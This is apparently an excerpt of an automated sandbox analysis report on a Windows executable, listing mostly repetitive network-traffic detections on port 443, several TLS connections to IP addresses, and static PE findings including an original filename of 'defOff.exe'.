              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
              Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
              Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
              Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
              Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
              Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
              Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
              Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.6:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49778 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49808 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49819 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49873 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49889 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49902 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49947 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49948 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49966 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:50026 version: TLS 1.2

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exe, 00000000.00000003.2401588475.0000000005FA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2406367357.0000000005FD3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2397787719.0000000005E93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2399582358.0000000005F95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2395082628.0000000005F6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2403066896.0000000005E98000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2405351363.0000000005FBC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2392790958.0000000005FF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2394807007.0000000005F5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2401150158.0000000005F9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2405036885.0000000005E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2390517256.0000000005F25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2406751676.0000000005FD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2396819346.0000000005F81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2429148023.00000000057B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2401257203.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2390586837.0000000005E96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2405828620.0000000005FC6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2405692722.0000000005E9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2402744080.0000000005EA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2394265783.0000000005F44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2392139523.0000000005E9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2397924190.0000000005F82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2394530508.0000000005F5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2428044210.0000000005876000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2403799266.0000000005EA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2402349667.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2394623070.0000000006021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2406919359.0000000006121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2394086762.0000000005F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2396486059.0000000005F67000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2401477095.0000000005E93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2392869212.0000000005E9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2392461600.0000000005E9A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2403553154.00000000060CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2403295013.0000000005FAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2392708539.0000000005F39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2429586016.0000000001237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2407601217.000000000611C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2428962102.00000000057EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2406536389.0000000005E9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2402579093.00000000060C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
